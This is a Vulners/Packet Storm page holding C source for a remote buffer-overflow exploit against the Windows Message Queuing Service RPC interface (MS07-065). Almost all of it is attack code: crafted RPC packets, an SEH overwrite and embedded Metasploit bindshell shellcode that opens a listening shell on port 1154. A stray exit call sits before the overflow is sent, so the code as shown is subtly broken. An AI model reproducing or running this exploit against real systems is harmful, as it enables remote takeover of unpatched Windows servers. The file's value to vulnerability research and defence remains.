Vulners
Lucene search
mswinqueue-overflow.txt
🗓️ 18 Jan 2008 00:00:00Reported by Marcin KozlowskiType 
packetstorm🔗 packetstormsecurity.com👁 22 Views
`/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
Mod of axis's code.
CHANGELOG
- added dnsname as a parameter, before it was hardcoded in the
request data. (Marcin Kozlowski)
Provided for legal security research and testing purposes ONLY
Go through the code :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock.h>
#include <io.h>
#pragma comment(lib,"ws2_32")
// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00
};
char *request_1;
// RPC Request Opnum: 0x06
char request_1a[] = {
0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00
};
char *request_1b;
char request_1c[] = {
0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode
0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx
0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode
0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
};
char request_2[] = {
0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
void
usage (char *argv)
{
printf (" Usage: %s -h 127.0.0.1 (Universal exploit)\n", argv);
printf (" %s -h host -n dnsname [-p port]\n", argv);
exit (1);
}
/************* TCP connect *************************/
void Disconnect (SOCKET s);
// ripped from isno
int
Make_Connection (char *address, int port, int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket (AF_INET, SOCK_STREAM, 0);
if (s < 0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr (address);
if (target.sin_addr.s_addr == 0)
{
closesocket (s);
return -2;
}
target.sin_port = htons ((short) port);
bf = 1;
ioctlsocket (s, FIONBIO, &bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO (&wd);
FD_SET (s, &wd);
connect (s, (struct sockaddr *) &target, sizeof (target));
if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1))
{
closesocket (s);
return -3;
}
if (i == 0)
{
closesocket (s);
return -4;
}
i = sizeof (int);
getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i);
if ((bf != 0) || (i != sizeof (int)))
{
closesocket (s);
return -5;
}
ioctlsocket (s, FIONBIO, &bf);
return s;
}
void
Disconnect (SOCKET s)
{
closesocket (s);
WSACleanup ();
}
/****************************************************/
int
main (int argc, char *argv[])
{
unsigned char *target = NULL;
unsigned char *name = NULL;
int port = 2103;
int i, j, len, len2;
int ret;
char buffer[6000] = { 0 };
SOCKET s;
WSADATA WSAData;
printf("--------------------------------------------------------------------------\n");
printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
printf("-== code by axis@ph4nt0m ==-\n");
printf("-== Http://www.ph4nt0m.org ==-\n");
printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf
("--------------------------------------------------------------------------\n\n");
if (argc < 5)
usage (argv[0]); //Handle parameters
for (i = 1; i < argc; i++)
{
if ((argv[i][0] == '-'))
{
switch (argv[i][1])
{
case 'h':
target = (unsigned char *) argv[i + 1];
break;
case 'p':
if (strcmp (argv[i + 1], "2103") == 0)
{
printf ("[+] Attacking default port 2103\n");
}
else
{
port = atoi (argv[i + 1]);
}
break;
case 'n':
name = (unsigned char *) argv[i + 1];
break;
default:
printf ("[-] Invalid argument: %s\n", argv[i]);
usage (argv[0]);
break;
}
i++;
}
else
usage (argv[0]);
}
request_1b = malloc (sizeof (char) * (strlen (name) * 2));
if (request_1b == NULL)
{
printf ("Allocation Error\n");
exit (1);
}
strcpy (request_1b, name);
for (i = 0, j = 0; j < (strlen (name) * 2); j++)
{
if (!(j % 2))
{
*(request_1b + j) = *(name + i);
}
else
{
*(request_1b + j) = '\x00';
i++;
}
}
/********************** attack payload ***************************/
if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
{
fprintf (stderr, "[-] WSAStartup failed.\n");
WSACleanup ();
exit (1);
}
Sleep (1200);
s = Make_Connection ((char *) target, port, 10);
if (s < 0)
{
fprintf (stderr, "[-] connect err.\n");
exit (1);
}
//Send our evil Payload
printf ("[*]Sending our Payload, Good Luck! ^_^\n");
printf ("[*]Sending RPC Bind String!\n");
send (s, bind_str, sizeof (bind_str), 0);
Sleep (1000);
printf ("[*]Sending RPC Request Now!\n");
len = 56 + (strlen (name) * 2) + 640;
request_1 = calloc (len, sizeof (char));
if (request_1 == NULL)
{
printf ("Allocation Error\n");
exit (1);
}
memcpy (request_1, request_1a, 56);
memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);
exit(1);
memset (buffer, '\x41', sizeof (buffer)); // fil the buffer to trigger seh
send (s, request_1, sizeof (request_1), 0);
send (s, buffer, 5104, 0); // fil the buffer to trigger seh
send (s, request_2, sizeof (request_2), 0);
Sleep (100);
memset (buffer, 0, sizeof (buffer));
ret = recv (s, buffer, sizeof (buffer) - 1, 0);
//printf("recv: %s\n", buffer);
Disconnect (s);
return 0;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4